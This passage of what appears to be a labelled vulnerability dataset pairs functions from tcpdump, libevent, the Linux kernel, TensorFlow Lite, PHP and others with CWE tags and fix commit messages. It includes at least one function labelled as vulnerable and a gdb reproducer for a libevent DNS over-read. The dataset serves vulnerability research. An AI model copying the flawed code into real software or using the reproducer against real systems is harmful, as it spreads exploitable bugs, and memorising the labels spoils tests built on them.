"|[rfc1048]")); }
0
[ "CWE-125" ]
tcpdump
29e5470e6ab84badbc31f4532bb7554a796d9d52
116,069,581,579,762,630,000,000,000,000,000,000,000
449
CVE-2017-13028/BOOTP: Add a bounds check before fetching data This fixes a buffer over-read discovered by Bhargava Shastry, SecT/TU Berlin. Add a test using the capture file supplied by the reporter(s), modified so the capture file won't cause 'tcpdump: pcap_loop: truncated dump file'
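A minimal sketch of the kind of bounds check this commit message describes, assuming tcpdump's netdissect ND_TCHECK2 macro and the existing trunc: label in the printer above; the exact spot and byte count in the upstream patch may differ:

    /* verify both bytes were actually captured before reading them */
    ND_TCHECK2(*bp, 2);
    if (*bp || *(bp + 1))
            ND_PRINT((ndo, "%u/%u ", *bp, *(bp + 1)));
    bp += 2;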
blobGetFilename(const blob *b) { assert(b != NULL); #ifdef CL_DEBUG assert(b->magic == BLOBCLASS); #endif return b->name; }
0
[ "CWE-476" ]
clamav-devel
8bb3716be9c7ab7c6a3a1889267b1072f48af87b
320,533,741,338,123,300,000,000,000,000,000,000,000
9
fuzz-22348 null deref in egg utf8 conversion Corrected memory leaks and a null dereference in the egg utf8 conversion.
WritingTask (TaskGroup *group, MultiPartOutputFile* file, vector<WritingTaskData*> data, Array2D<FrameBuffer>* tiledFrameBuffers): Task(group), file(file), data(data), tiledFrameBuffers(tiledFrameBuffers) {}
0
[ "CWE-125" ]
openexr
e79d2296496a50826a15c667bf92bdc5a05518b4
135,807,216,463,724,700,000,000,000,000,000,000,000
7
fix memory leaks and invalid memory accesses Signed-off-by: Peter Hillman <[email protected]>
PJ_DEF(void) pjsua_media_config_default(pjsua_media_config *cfg) { const pj_sys_info *si = pj_get_sys_info(); pj_str_t dev_model = {"iPhone5", 7}; pj_bzero(cfg, sizeof(*cfg)); cfg->clock_rate = PJSUA_DEFAULT_CLOCK_RATE; /* It is reported that there may be some media server resampling problem * with iPhone 5 devices running iOS 7, so we set the sound device's * clock rate to 44100 to avoid resampling. */ if (pj_stristr(&si->machine, &dev_model) && ((si->os_ver & 0xFF000000) >> 24) >= 7) { cfg->snd_clock_rate = 44100; } else { cfg->snd_clock_rate = 0; } cfg->channel_count = 1; cfg->audio_frame_ptime = PJSUA_DEFAULT_AUDIO_FRAME_PTIME; cfg->max_media_ports = PJSUA_MAX_CONF_PORTS; cfg->has_ioqueue = PJ_TRUE; cfg->thread_cnt = 1; cfg->quality = PJSUA_DEFAULT_CODEC_QUALITY; cfg->ilbc_mode = PJSUA_DEFAULT_ILBC_MODE; cfg->ec_tail_len = PJSUA_DEFAULT_EC_TAIL_LEN; cfg->snd_rec_latency = PJMEDIA_SND_DEFAULT_REC_LATENCY; cfg->snd_play_latency = PJMEDIA_SND_DEFAULT_PLAY_LATENCY; cfg->jb_init = cfg->jb_min_pre = cfg->jb_max_pre = cfg->jb_max = -1; cfg->jb_discard_algo = PJMEDIA_JB_DISCARD_PROGRESSIVE; cfg->snd_auto_close_time = 1; cfg->ice_max_host_cands = -1; cfg->ice_always_update = PJ_TRUE; pj_ice_sess_options_default(&cfg->ice_opt); cfg->turn_conn_type = PJ_TURN_TP_UDP; #if PJ_HAS_SSL_SOCK pj_turn_sock_tls_cfg_default(&cfg->turn_tls_setting); #endif cfg->vid_preview_enable_native = PJ_TRUE; }
0
[ "CWE-120", "CWE-787" ]
pjproject
d27f79da11df7bc8bb56c2f291d71e54df8d2c47
47,596,734,285,039,530,000,000,000,000,000,000,000
43
Use PJ_ASSERT_RETURN() on pjsip_auth_create_digest() and pjsua_init_tpselector() (#3009) * Use PJ_ASSERT_RETURN on pjsip_auth_create_digest * Use PJ_ASSERT_RETURN on pjsua_init_tpselector() * Fix incorrect check. * Add return value to pjsip_auth_create_digest() and pjsip_auth_create_digestSHA256() * Modification based on comments.
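A minimal sketch of the argument-validation pattern this commit message describes, using pjlib's PJ_ASSERT_RETURN(); the function name and parameter list are simplified assumptions, not the exact pjsip signature:

    PJ_DEF(pj_status_t) create_digest_checked(pj_str_t *result,
                                              const pj_str_t *nonce,
                                              const pjsip_cred_info *cred)
    {
        /* reject NULL arguments up front instead of dereferencing them */
        PJ_ASSERT_RETURN(result && nonce && cred, PJ_EINVAL);

        /* ... compute the digest into *result ... */
        return PJ_SUCCESS;
    }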
server_port_read(struct evdns_server_port *s) { u8 packet[1500]; struct sockaddr_storage addr; ev_socklen_t addrlen; int r; ASSERT_LOCKED(s); for (;;) { addrlen = sizeof(struct sockaddr_storage); r = recvfrom(s->socket, (void*)packet, sizeof(packet), 0, (struct sockaddr*) &addr, &addrlen); if (r < 0) { int err = evutil_socket_geterror(s->socket); if (EVUTIL_ERR_RW_RETRIABLE(err)) return; log(EVDNS_LOG_WARN, "Error %s (%d) while reading request.", evutil_socket_error_to_string(err), err); return; } request_parse(packet, r, s, (struct sockaddr*) &addr, addrlen); } }
0
[ "CWE-125" ]
libevent
96f64a022014a208105ead6c8a7066018449d86d
38,768,749,988,075,110,000,000,000,000,000,000,000
23
evdns: name_parse(): fix remote stack overread @asn-the-goblin-slayer: "the name_parse() function in libevent's DNS code is vulnerable to a buffer overread. 971 if (cp != name_out) { 972 if (cp + 1 >= end) return -1; 973 *cp++ = '.'; 974 } 975 if (cp + label_len >= end) return -1; 976 memcpy(cp, packet + j, label_len); 977 cp += label_len; 978 j += label_len; No check is made against length before the memcpy occurs. This was found through the Tor bug bounty program and the discovery should be credited to 'Guido Vranken'." Reproducer for gdb (https://gist.github.com/azat/e4fcf540e9b89ab86d02): set $PROT_NONE=0x0 set $PROT_READ=0x1 set $PROT_WRITE=0x2 set $MAP_ANONYMOUS=0x20 set $MAP_SHARED=0x01 set $MAP_FIXED=0x10 set $MAP_32BIT=0x40 start set $length=202 # overread set $length=2 # allocate with mmap to have a seg fault on page boundary set $l=(1<<20)*2 p mmap(0, $l, $PROT_READ|$PROT_WRITE, $MAP_ANONYMOUS|$MAP_SHARED|$MAP_32BIT, -1, 0) set $packet=(char *)$1+$l-$length # hack the packet set $packet[0]=63 set $packet[1]='/' p malloc(sizeof(int)) set $idx=(int *)$2 set $idx[0]=0 set $name_out_len=202 p malloc($name_out_len) set $name_out=$3 # have WRITE only mapping to fail on read set $end=$1+$l p (void *)mmap($end, 1<<12, $PROT_NONE, $MAP_ANONYMOUS|$MAP_SHARED|$MAP_FIXED|$MAP_32BIT, -1, 0) set $m=$4 p name_parse($packet, $length, $idx, $name_out, $name_out_len) x/2s (char *)$name_out Before this patch: $ gdb -ex 'source gdb' dns-example $1 = 1073741824 $2 = (void *) 0x633010 $3 = (void *) 0x633030 $4 = (void *) 0x40200000 Program received signal SIGSEGV, Segmentation fault. __memcpy_sse2_unaligned () at memcpy-sse2-unaligned.S:33 After this patch: $ gdb -ex 'source gdb' dns-example $1 = 1073741824 $2 = (void *) 0x633010 $3 = (void *) 0x633030 $4 = (void *) 0x40200000 $5 = -1 0x633030: "/" 0x633032: "" (gdb) p $m $6 = (void *) 0x40200000 (gdb) p $1 $7 = 1073741824 (gdb) p/x $1 $8 = 0x40000000 (gdb) quit P.S. plus drop one condition duplicate. Fixes: #317
int __xfrm_decode_session(struct sk_buff *skb, struct flowi *fl, unsigned int family, int reverse) { const struct xfrm_policy_afinfo *afinfo = xfrm_policy_get_afinfo(family); int err; if (unlikely(afinfo == NULL)) return -EAFNOSUPPORT; afinfo->decode_session(skb, fl, reverse); err = security_xfrm_decode_session(skb, &fl->flowi_secid); rcu_read_unlock(); return err; }
0
[ "CWE-125" ]
ipsec
7bab09631c2a303f87a7eb7e3d69e888673b9b7e
259,805,604,217,518,370,000,000,000,000,000,000,000
14
xfrm: policy: check policy direction value The 'dir' parameter in xfrm_migrate() is a user-controlled byte which is used as an array index. This can lead to an out-of-bound access, kernel lockup and DoS. Add a check for the 'dir' value. This fixes CVE-2017-11600. References: https://bugzilla.redhat.com/show_bug.cgi?id=1474928 Fixes: 80c9abaabf42 ("[XFRM]: Extension for dynamic update of endpoint address(es)") Cc: <[email protected]> # v2.6.21-rc1 Reported-by: "bo Zhang" <[email protected]> Signed-off-by: Vladis Dronov <[email protected]> Signed-off-by: Steffen Klassert <[email protected]>
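A minimal sketch of the fix this commit message describes: reject an out-of-range, user-controlled 'dir' before it is used as an array index (XFRM_POLICY_MAX is the kernel's bound on policy directions):

    if (dir >= XFRM_POLICY_MAX)
            return -EINVAL;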
int ssl2_put_cipher_by_char(const SSL_CIPHER *c, unsigned char *p) { long l; if (p != NULL) { l=c->id; if ((l & 0xff000000) != 0x02000000 && l != SSL3_CK_FALLBACK_SCSV) return(0); p[0]=((unsigned char)(l>>16L))&0xFF; p[1]=((unsigned char)(l>> 8L))&0xFF; p[2]=((unsigned char)(l ))&0xFF; } return(3); }
0
[ "CWE-310" ]
openssl
cf6da05304d554aaa885151451aa4ecaa977e601
31,511,907,699,976,810,000,000,000,000,000,000,000
14
Support TLS_FALLBACK_SCSV. Reviewed-by: Stephen Henson <[email protected]>
enable_progress(void) { term.lines[term.curs.y]->lattr |= LATTR_PROGRESS; }
0
[ "CWE-703", "CWE-770" ]
mintty
bd52109993440b6996760aaccb66e68e782762b9
63,053,995,155,576,900,000,000,000,000,000,000,000
4
tame some window operations, just in case
TfLiteStatus ReverseSequenceHelper(TfLiteContext* context, TfLiteNode* node) { const TfLiteTensor* seq_lengths_tensor = GetInput(context, node, kSeqLengthsTensor); switch (seq_lengths_tensor->type) { case kTfLiteInt32: { return ReverseSequenceImpl<T, int32_t>(context, node); } case kTfLiteInt64: { return ReverseSequenceImpl<T, int64_t>(context, node); } default: { context->ReportError( context, "Seq_lengths type '%s' is not supported by reverse_sequence.", TfLiteTypeGetName(seq_lengths_tensor->type)); return kTfLiteError; } } return kTfLiteOk; }
1
[ "CWE-125", "CWE-787" ]
tensorflow
1970c2158b1ffa416d159d03c3370b9a462aee35
326,008,880,457,837,000,000,000,000,000,000,000,000
20
[tflite]: Insert `nullptr` checks when obtaining tensors. As part of ongoing refactoring, `tflite::GetInput`, `tflite::GetOutput`, `tflite::GetTemporary` and `tflite::GetIntermediates` will return `nullptr` in some cases. Hence, we insert the `nullptr` checks on all usages. We also insert `nullptr` checks on usages of `tflite::GetVariableInput` and `tflite::GetOptionalInputTensor` but only in the cases where there is no obvious check that `nullptr` is acceptable (that is, we only insert the check for the output of these two functions if the tensor is accessed as if it is always not `nullptr`). PiperOrigin-RevId: 332521299 Change-Id: I29af455bcb48d0b92e58132d951a3badbd772d56
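A minimal sketch of the null check this commit message describes, applied to the ReverseSequenceHelper entry above; TF_LITE_ENSURE reports through the context and returns kTfLiteError when the condition fails:

    const TfLiteTensor* seq_lengths_tensor =
        GetInput(context, node, kSeqLengthsTensor);
    // After the refactor GetInput() may return nullptr, so check before use.
    TF_LITE_ENSURE(context, seq_lengths_tensor != nullptr);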
SSL_METHOD *ssl_bad_method(int ver) { SSLerr(SSL_F_SSL_BAD_METHOD,ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED); return(NULL); }
0
[]
openssl
ee2ffc279417f15fef3b1073c7dc81a908991516
203,431,430,310,870,630,000,000,000,000,000,000,000
5
Add Next Protocol Negotiation.
int sg_scsi_ioctl(struct request_queue *q, struct gendisk *disk, fmode_t mode, struct scsi_ioctl_command __user *sic) { struct request *rq; int err; unsigned int in_len, out_len, bytes, opcode, cmdlen; char *buffer = NULL, sense[SCSI_SENSE_BUFFERSIZE]; if (!sic) return -EINVAL; /* * get in an out lengths, verify they don't exceed a page worth of data */ if (get_user(in_len, &sic->inlen)) return -EFAULT; if (get_user(out_len, &sic->outlen)) return -EFAULT; if (in_len > PAGE_SIZE || out_len > PAGE_SIZE) return -EINVAL; if (get_user(opcode, sic->data)) return -EFAULT; bytes = max(in_len, out_len); if (bytes) { buffer = kzalloc(bytes, q->bounce_gfp | GFP_USER| __GFP_NOWARN); if (!buffer) return -ENOMEM; } rq = blk_get_request(q, in_len ? WRITE : READ, __GFP_WAIT); cmdlen = COMMAND_SIZE(opcode); /* * get command and data to send to device, if any */ err = -EFAULT; rq->cmd_len = cmdlen; if (copy_from_user(rq->cmd, sic->data, cmdlen)) goto error; if (in_len && copy_from_user(buffer, sic->data + cmdlen, in_len)) goto error; err = blk_verify_command(rq->cmd, mode & FMODE_WRITE); if (err) goto error; /* default. possible overriden later */ rq->retries = 5; switch (opcode) { case SEND_DIAGNOSTIC: case FORMAT_UNIT: rq->timeout = FORMAT_UNIT_TIMEOUT; rq->retries = 1; break; case START_STOP: rq->timeout = START_STOP_TIMEOUT; break; case MOVE_MEDIUM: rq->timeout = MOVE_MEDIUM_TIMEOUT; break; case READ_ELEMENT_STATUS: rq->timeout = READ_ELEMENT_STATUS_TIMEOUT; break; case READ_DEFECT_DATA: rq->timeout = READ_DEFECT_DATA_TIMEOUT; rq->retries = 1; break; default: rq->timeout = BLK_DEFAULT_SG_TIMEOUT; break; } if (bytes && blk_rq_map_kern(q, rq, buffer, bytes, __GFP_WAIT)) { err = DRIVER_ERROR << 24; goto out; } memset(sense, 0, sizeof(sense)); rq->sense = sense; rq->sense_len = 0; rq->cmd_type = REQ_TYPE_BLOCK_PC; blk_execute_rq(q, disk, rq, 0); out: err = rq->errors & 0xff; /* only 8 bit SCSI status */ if (err) { if (rq->sense_len && rq->sense) { bytes = (OMAX_SB_LEN > rq->sense_len) ? rq->sense_len : OMAX_SB_LEN; if (copy_to_user(sic->data, rq->sense, bytes)) err = -EFAULT; } } else { if (copy_to_user(sic->data, buffer, out_len)) err = -EFAULT; } error: kfree(buffer); blk_put_request(rq); return err; }
0
[ "CWE-284", "CWE-264" ]
linux
0bfc96cb77224736dfa35c3c555d37b3646ef35e
70,536,527,237,476,120,000,000,000,000,000,000,000
108
block: fail SCSI passthrough ioctls on partition devices Linux allows executing the SG_IO ioctl on a partition or LVM volume, and will pass the command to the underlying block device. This is well-known, but it is also a large security problem when (via Unix permissions, ACLs, SELinux or a combination thereof) a program or user needs to be granted access only to part of the disk. This patch lets partitions forward a small set of harmless ioctls; others are logged with printk so that we can see which ioctls are actually sent. In my tests only CDROM_GET_CAPABILITY actually occurred. Of course it was being sent to a (partition on a) hard disk, so it would have failed with ENOTTY and the patch isn't changing anything in practice. Still, I'm treating it specially to avoid spamming the logs. In principle, this restriction should include programs running with CAP_SYS_RAWIO. If for example I let a program access /dev/sda2 and /dev/sdb, it still should not be able to read/write outside the boundaries of /dev/sda2 independent of the capabilities. However, for now programs with CAP_SYS_RAWIO will still be allowed to send the ioctls. Their actions will still be logged. This patch does not affect the non-libata IDE driver. That driver however already tests for bd != bd->bd_contains before issuing some ioctl; it could be restricted further to forbid these ioctls even for programs running with CAP_SYS_ADMIN/CAP_SYS_RAWIO. Cc: [email protected] Cc: Jens Axboe <[email protected]> Cc: James Bottomley <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]> [ Make it also print the command name when warning - Linus ] Signed-off-by: Linus Torvalds <[email protected]>
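A hedged sketch of the policy this commit message describes: when a SCSI passthrough ioctl arrives on a partition rather than the whole device, forward only known-harmless commands, still let CAP_SYS_RAWIO callers through (logged upstream), and refuse the rest; the function name and the exact whitelist are assumptions for illustration:

    static int partition_ioctl_allowed(struct block_device *bdev, unsigned int cmd)
    {
            if (bdev == bdev->bd_contains)
                    return 0;               /* whole device: no restriction */

            switch (cmd) {
            case CDROM_GET_CAPABILITY:      /* harmless query, forwarded */
                    return 0;
            default:
                    if (capable(CAP_SYS_RAWIO))
                            return 0;       /* privileged callers still allowed */
                    return -ENOIOCTLCMD;    /* everything else is rejected */
            }
    }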
void ip6_flush_pending_frames(struct sock *sk) { struct inet_sock *inet = inet_sk(sk); struct ipv6_pinfo *np = inet6_sk(sk); struct sk_buff *skb; while ((skb = __skb_dequeue_tail(&sk->sk_write_queue)) != NULL) { IP6_INC_STATS(IPSTATS_MIB_OUTDISCARDS); kfree_skb(skb); } inet->cork.flags &= ~IPCORK_OPT; if (np->cork.opt) { kfree(np->cork.opt); np->cork.opt = NULL; } if (np->cork.rt) { dst_release(&np->cork.rt->u.dst); np->cork.rt = NULL; inet->cork.flags &= ~IPCORK_ALLFRAG; } memset(&inet->cork.fl, 0, sizeof(inet->cork.fl)); }
0
[]
linux
e89e9cf539a28df7d0eb1d0a545368e9920b34ac
135,682,261,570,317,940,000,000,000,000,000,000,000
24
[IPv4/IPv6]: UFO Scatter-gather approach Attached is kernel patch for UDP Fragmentation Offload (UFO) feature. 1. This patch incorporate the review comments by Jeff Garzik. 2. Renamed USO as UFO (UDP Fragmentation Offload) 3. udp sendfile support with UFO This patches uses scatter-gather feature of skb to generate large UDP datagram. Below is a "how-to" on changes required in network device driver to use the UFO interface. UDP Fragmentation Offload (UFO) Interface: ------------------------------------------- UFO is a feature wherein the Linux kernel network stack will offload the IP fragmentation functionality of large UDP datagram to hardware. This will reduce the overhead of stack in fragmenting the large UDP datagram to MTU sized packets 1) Drivers indicate their capability of UFO using dev->features |= NETIF_F_UFO | NETIF_F_HW_CSUM | NETIF_F_SG NETIF_F_HW_CSUM is required for UFO over ipv6. 2) UFO packet will be submitted for transmission using driver xmit routine. UFO packet will have a non-zero value for "skb_shinfo(skb)->ufo_size" skb_shinfo(skb)->ufo_size will indicate the length of data part in each IP fragment going out of the adapter after IP fragmentation by hardware. skb->data will contain MAC/IP/UDP header and skb_shinfo(skb)->frags[] contains the data payload. The skb->ip_summed will be set to CHECKSUM_HW indicating that hardware has to do checksum calculation. Hardware should compute the UDP checksum of complete datagram and also ip header checksum of each fragmented IP packet. For IPV6 the UFO provides the fragment identification-id in skb_shinfo(skb)->ip6_frag_id. The adapter should use this ID for generating IPv6 fragments. Signed-off-by: Ananda Raju <[email protected]> Signed-off-by: Rusty Russell <[email protected]> (forwarded) Signed-off-by: Arnaldo Carvalho de Melo <[email protected]>
PHP_FUNCTION(imagefilter) { zval *tmp; typedef void (*image_filter)(INTERNAL_FUNCTION_PARAMETERS); zend_long filtertype; image_filter filters[] = { php_image_filter_negate , php_image_filter_grayscale, php_image_filter_brightness, php_image_filter_contrast, php_image_filter_colorize, php_image_filter_edgedetect, php_image_filter_emboss, php_image_filter_gaussian_blur, php_image_filter_selective_blur, php_image_filter_mean_removal, php_image_filter_smooth, php_image_filter_pixelate }; if (ZEND_NUM_ARGS() < 2 || ZEND_NUM_ARGS() > IMAGE_FILTER_MAX_ARGS) { WRONG_PARAM_COUNT; } else if (zend_parse_parameters(2, "rl", &tmp, &filtertype) == FAILURE) { return; } if (filtertype >= 0 && filtertype <= IMAGE_FILTER_MAX) { filters[filtertype](INTERNAL_FUNCTION_PARAM_PASSTHRU); } }
0
[ "CWE-787" ]
php-src
28022c9b1fd937436ab67bb3d61f652c108baf96
66,341,866,631,054,650,000,000,000,000,000,000,000
32
Fix bug#72697 - select_colors write out-of-bounds (cherry picked from commit b6f13a5ef9d6280cf984826a5de012a32c396cd4) Conflicts: ext/gd/gd.c
PHP_FUNCTION(imagecolorset) { zval *IM; long color, red, green, blue; int col; gdImagePtr im; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rllll", &IM, &color, &red, &green, &blue) == FAILURE) { return; } ZEND_FETCH_RESOURCE(im, gdImagePtr, &IM, -1, "Image", le_gd); col = color; if (col >= 0 && col < gdImageColorsTotal(im)) { im->red[col] = red; im->green[col] = green; im->blue[col] = blue; } else { RETURN_FALSE; } }
0
[]
php-src
ce96fd6b0761d98353761bf78d5bfb55291179fd
258,894,749,962,681,980,000,000,000,000,000,000,000
23
- fix #39863, do not accept paths with NULL in them. See http://news.php.net/php.internals/50191, trunk will have the patch later (adding a macro and/or changing (some) APIs. Patch by Rasmus
static void vmx_complete_interrupts(struct vcpu_vmx *vmx) { u32 exit_intr_info; u32 idt_vectoring_info = vmx->idt_vectoring_info; bool unblock_nmi; u8 vector; int type; bool idtv_info_valid; exit_intr_info = vmcs_read32(VM_EXIT_INTR_INFO); vmx->exit_reason = vmcs_read32(VM_EXIT_REASON); /* Handle machine checks before interrupts are enabled */ if ((vmx->exit_reason == EXIT_REASON_MCE_DURING_VMENTRY) || (vmx->exit_reason == EXIT_REASON_EXCEPTION_NMI && is_machine_check(exit_intr_info))) kvm_machine_check(); /* We need to handle NMIs before interrupts are enabled */ if ((exit_intr_info & INTR_INFO_INTR_TYPE_MASK) == INTR_TYPE_NMI_INTR && (exit_intr_info & INTR_INFO_VALID_MASK)) { kvm_before_handle_nmi(&vmx->vcpu); asm("int $2"); kvm_after_handle_nmi(&vmx->vcpu); } idtv_info_valid = idt_vectoring_info & VECTORING_INFO_VALID_MASK; if (cpu_has_virtual_nmis()) { unblock_nmi = (exit_intr_info & INTR_INFO_UNBLOCK_NMI) != 0; vector = exit_intr_info & INTR_INFO_VECTOR_MASK; /* * SDM 3: 27.7.1.2 (September 2008) * Re-set bit "block by NMI" before VM entry if vmexit caused by * a guest IRET fault. * SDM 3: 23.2.2 (September 2008) * Bit 12 is undefined in any of the following cases: * If the VM exit sets the valid bit in the IDT-vectoring * information field. * If the VM exit is due to a double fault. */ if ((exit_intr_info & INTR_INFO_VALID_MASK) && unblock_nmi && vector != DF_VECTOR && !idtv_info_valid) vmcs_set_bits(GUEST_INTERRUPTIBILITY_INFO, GUEST_INTR_STATE_NMI); } else if (unlikely(vmx->soft_vnmi_blocked)) vmx->vnmi_blocked_time += ktime_to_ns(ktime_sub(ktime_get(), vmx->entry_time)); vmx->vcpu.arch.nmi_injected = false; kvm_clear_exception_queue(&vmx->vcpu); kvm_clear_interrupt_queue(&vmx->vcpu); if (!idtv_info_valid) return; vector = idt_vectoring_info & VECTORING_INFO_VECTOR_MASK; type = idt_vectoring_info & VECTORING_INFO_TYPE_MASK; switch (type) { case INTR_TYPE_NMI_INTR: vmx->vcpu.arch.nmi_injected = true; /* * SDM 3: 27.7.1.2 (September 2008) * Clear bit "block by NMI" before VM entry if a NMI * delivery faulted. */ vmcs_clear_bits(GUEST_INTERRUPTIBILITY_INFO, GUEST_INTR_STATE_NMI); break; case INTR_TYPE_SOFT_EXCEPTION: vmx->vcpu.arch.event_exit_inst_len = vmcs_read32(VM_EXIT_INSTRUCTION_LEN); /* fall through */ case INTR_TYPE_HARD_EXCEPTION: if (idt_vectoring_info & VECTORING_INFO_DELIVER_CODE_MASK) { u32 err = vmcs_read32(IDT_VECTORING_ERROR_CODE); kvm_queue_exception_e(&vmx->vcpu, vector, err); } else kvm_queue_exception(&vmx->vcpu, vector); break; case INTR_TYPE_SOFT_INTR: vmx->vcpu.arch.event_exit_inst_len = vmcs_read32(VM_EXIT_INSTRUCTION_LEN); /* fall through */ case INTR_TYPE_EXT_INTR: kvm_queue_interrupt(&vmx->vcpu, vector, type == INTR_TYPE_SOFT_INTR); break; default: break; } }
0
[ "CWE-400" ]
linux-2.6
9581d442b9058d3699b4be568b6e5eae38a41493
338,978,536,654,989,500,000,000,000,000,000,000,000
94
KVM: Fix fs/gs reload oops with invalid ldt kvm reloads the host's fs and gs blindly, however the underlying segment descriptors may be invalid due to the user modifying the ldt after loading them. Fix by using the safe accessors (loadsegment() and load_gs_index()) instead of home grown unsafe versions. This is CVE-2010-3698. KVM-Stable-Tag. Signed-off-by: Avi Kivity <[email protected]> Signed-off-by: Marcelo Tosatti <[email protected]>
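A minimal sketch of the safe reload pattern this commit message describes: restore the host's %fs/%gs with loadsegment()/load_gs_index(), which tolerate a selector invalidated by a user-modified LDT, instead of a raw mov into the segment register; the host_*_sel variables are placeholders for the saved host selectors:

    loadsegment(fs, host_fs_sel);
    #ifdef CONFIG_X86_64
    load_gs_index(host_gs_sel);
    #else
    loadsegment(gs, host_gs_sel);
    #endif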
test_full (void) { g_autoptr(GError) error = NULL; g_autoptr(FlatpakBwrap) bwrap = flatpak_bwrap_new (NULL); g_autoptr(FlatpakExports) exports = flatpak_exports_new (); g_autofree gchar *subdir = g_build_filename (testdir, "test_full", NULL); g_autofree gchar *expose_rw = g_build_filename (subdir, "expose-rw", NULL); g_autofree gchar *in_expose_rw = g_build_filename (subdir, "expose-rw", "file", NULL); g_autofree gchar *dangling_link_in_expose_rw = g_build_filename (subdir, "expose-rw", "dangling", NULL); g_autofree gchar *expose_ro = g_build_filename (subdir, "expose-ro", NULL); g_autofree gchar *in_expose_ro = g_build_filename (subdir, "expose-ro", "file", NULL); g_autofree gchar *hide = g_build_filename (subdir, "hide", NULL); g_autofree gchar *dont_hide = g_build_filename (subdir, "dont-hide", NULL); g_autofree gchar *hide_below_expose = g_build_filename (subdir, "expose-ro", "hide-me", NULL); g_autofree gchar *enoent = g_build_filename (subdir, "ENOENT", NULL); g_autofree gchar *one = g_build_filename (subdir, "1", NULL); g_autofree gchar *rel_link = g_build_filename (subdir, "1", "rel-link", NULL); g_autofree gchar *abs_link = g_build_filename (subdir, "1", "abs-link", NULL); g_autofree gchar *in_abs_link = g_build_filename (subdir, "1", "abs-link", "file", NULL); g_autofree gchar *dangling = g_build_filename (subdir, "1", "dangling", NULL); g_autofree gchar *in_dangling = g_build_filename (subdir, "1", "dangling", "file", NULL); g_autofree gchar *abs_target = g_build_filename (subdir, "2", "abs-target", NULL); g_autofree gchar *target = g_build_filename (subdir, "2", "target", NULL); g_autofree gchar *create_dir = g_build_filename (subdir, "create-dir", NULL); g_autofree gchar *create_dir2 = g_build_filename (subdir, "create-dir2", NULL); gsize i; glnx_shutil_rm_rf_at (-1, subdir, NULL, &error); if (error != NULL) { g_assert_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND); g_clear_error (&error); } if (g_mkdir_with_parents (expose_rw, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (expose_ro, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (hide_below_expose, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (hide, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (dont_hide, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (dont_hide, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (abs_target, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (target, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (one, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (g_mkdir_with_parents (create_dir, S_IRWXU) != 0) g_error ("mkdir: %s", g_strerror (errno)); if (symlink (abs_target, abs_link) != 0) g_error ("symlink: %s", g_strerror (errno)); if (symlink ("nope", dangling) != 0) g_error ("symlink: %s", g_strerror (errno)); if (symlink ("nope", dangling_link_in_expose_rw) != 0) g_error ("symlink: %s", g_strerror (errno)); if (symlink ("../2/target", rel_link) != 0) g_error ("symlink: %s", g_strerror (errno)); flatpak_exports_add_host_etc_expose (exports, FLATPAK_FILESYSTEM_MODE_READ_WRITE); flatpak_exports_add_host_os_expose (exports, FLATPAK_FILESYSTEM_MODE_READ_ONLY); flatpak_exports_add_path_expose (exports, FLATPAK_FILESYSTEM_MODE_READ_WRITE, expose_rw); flatpak_exports_add_path_expose (exports, 
FLATPAK_FILESYSTEM_MODE_READ_ONLY, expose_ro); flatpak_exports_add_path_tmpfs (exports, hide_below_expose); flatpak_exports_add_path_expose_or_hide (exports, FLATPAK_FILESYSTEM_MODE_NONE, hide); flatpak_exports_add_path_expose_or_hide (exports, FLATPAK_FILESYSTEM_MODE_READ_ONLY, dont_hide); flatpak_exports_add_path_expose_or_hide (exports, FLATPAK_FILESYSTEM_MODE_READ_ONLY, enoent); flatpak_exports_add_path_expose_or_hide (exports, FLATPAK_FILESYSTEM_MODE_READ_WRITE, rel_link); flatpak_exports_add_path_expose_or_hide (exports, FLATPAK_FILESYSTEM_MODE_READ_WRITE, abs_link); flatpak_exports_add_path_dir (exports, create_dir); flatpak_exports_add_path_dir (exports, create_dir2); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, expose_rw), ==, FLATPAK_FILESYSTEM_MODE_READ_WRITE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, expose_ro), ==, FLATPAK_FILESYSTEM_MODE_READ_ONLY); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, hide_below_expose), ==, FLATPAK_FILESYSTEM_MODE_NONE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, hide), ==, FLATPAK_FILESYSTEM_MODE_NONE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, dont_hide), ==, FLATPAK_FILESYSTEM_MODE_READ_ONLY); /* It knows enoent didn't really exist */ g_assert_cmpuint (flatpak_exports_path_get_mode (exports, enoent), ==, FLATPAK_FILESYSTEM_MODE_NONE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, abs_link), ==, FLATPAK_FILESYSTEM_MODE_READ_WRITE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, rel_link), ==, FLATPAK_FILESYSTEM_MODE_READ_WRITE); /* Files the app would be allowed to create count as exposed */ g_assert_cmpuint (flatpak_exports_path_get_mode (exports, in_expose_ro), ==, FLATPAK_FILESYSTEM_MODE_NONE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, in_expose_rw), ==, FLATPAK_FILESYSTEM_MODE_READ_WRITE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, in_abs_link), ==, FLATPAK_FILESYSTEM_MODE_READ_WRITE); g_assert_cmpuint (flatpak_exports_path_get_mode (exports, in_dangling), ==, FLATPAK_FILESYSTEM_MODE_NONE); flatpak_bwrap_add_arg (bwrap, "bwrap"); flatpak_exports_append_bwrap_args (exports, bwrap); flatpak_bwrap_finish (bwrap); print_bwrap (bwrap); i = 0; g_assert_cmpuint (i, <, bwrap->argv->len); 